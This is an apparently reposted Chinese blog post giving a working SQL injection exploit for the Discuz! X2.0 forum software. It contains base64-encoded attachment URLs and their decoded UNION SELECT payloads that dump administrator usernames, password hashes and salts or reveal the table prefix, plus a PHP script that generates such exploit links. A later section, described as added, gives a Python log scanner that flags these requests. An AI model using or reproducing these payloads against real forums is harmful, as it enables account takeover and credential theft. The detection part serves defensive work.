(Repost) Discuz! X2.0 SQL injection vulnerability EXP

Posted by 科技小先鋒 on 2017-11-15

On DZ 2.0, this directly dumps the administrator account and password (when the default table prefix is in use):

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

Base64-decoded, the aid value is:

1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where  username like 'admin|x|y

If the table prefix is not the default, use this EXP to reveal the prefix:

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

 ———————–

Here is a PHP EXP as well:

<?php
// Placeholder: address of the X2.0 forum
$host = "http://X2.0論壇地址";
// Placeholder: the username to query
$affuser = "要爆的使用者名稱username";

// First link: reveal the table prefix
echo '<a href="';
echo $host."forum.php?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y"));
echo '" target="_blank">爆字首</a>';
echo "<br>";

// Second link: reveal password and salt for $affuser
echo '<a href="';
echo $host."forum.php?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like '$affuser|x|y"));
echo '" target="_blank">爆password,salt</a>';
?>
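
For detection, the same request shape can be hunted in web server access logs. The following is an added example, not part of the original post: it decodes the aid parameter of forum.php?mod=attachment requests and flags values whose first "|"-separated field is not a plain number. The combined log format, the rule that a legitimate aid starts with a numeric attachment id, and the sample log lines are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Request part of a combined-format access log line (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(union|select|group_concat|information_schema)\b", re.I)


def decode_aid(raw):
    """Base64-decode an aid value leniently, as PHP's base64_decode() does."""
    raw = raw.replace(" ", "+").rstrip("=")  # parse_qs turns '+' into ' '
    raw += "=" * (-len(raw) % 4)             # normalise missing or surplus padding
    try:
        return base64.b64decode(raw).decode("utf-8", "replace")
    except ValueError:                       # includes binascii.Error
        return None


def inspect_line(line):
    """Return (decoded_aid, reason) for a suspicious attachment request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    query = parse_qs(url.query)
    if not url.path.endswith("forum.php") or query.get("mod") != ["attachment"]:
        return None
    for raw in query.get("aid", []):
        decoded = decode_aid(raw)
        if decoded is None:
            return raw, "aid is not decodable base64"
        # Assumption: the first '|'-separated field is a numeric attachment id.
        if not re.fullmatch(r"[0-9]+", decoded.split("|", 1)[0]):
            tokens = sorted({t.lower() for t in SQL_TOKENS.findall(decoded)})
            return decoded, "non-numeric first field; SQL tokens: %s" % tokens
    return None


# Constructed sample input: one benign aid and one shaped like the page's payload.
BENIGN = quote(base64.b64encode(b"1234|0a1b2c3d|1300000000|5|0").decode(), safe="")
HOSTILE = quote(base64.b64encode(b"1' and 1=2 union all select 1,2|x|y").decode(), safe="")
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:00:00:01 +0000] "GET /forum.php?mod=attachment&aid=%s HTTP/1.1" 200 512' % BENIGN,
    '203.0.113.9 - - [01/Jan/2024:00:00:02 +0000] "GET /forum.php?mod=attachment&findpost=ss&aid=%s HTTP/1.1" 200 512' % HOSTILE,
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

The padding normalisation matters because the URLs above end in a single surplus %3D, which a strict base64 decoder would reject.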

This article is reposted from enables' 51CTO blog. Original link: http://blog.51cto.com/niuzu/599557. To repost it, please contact the original author yourself.

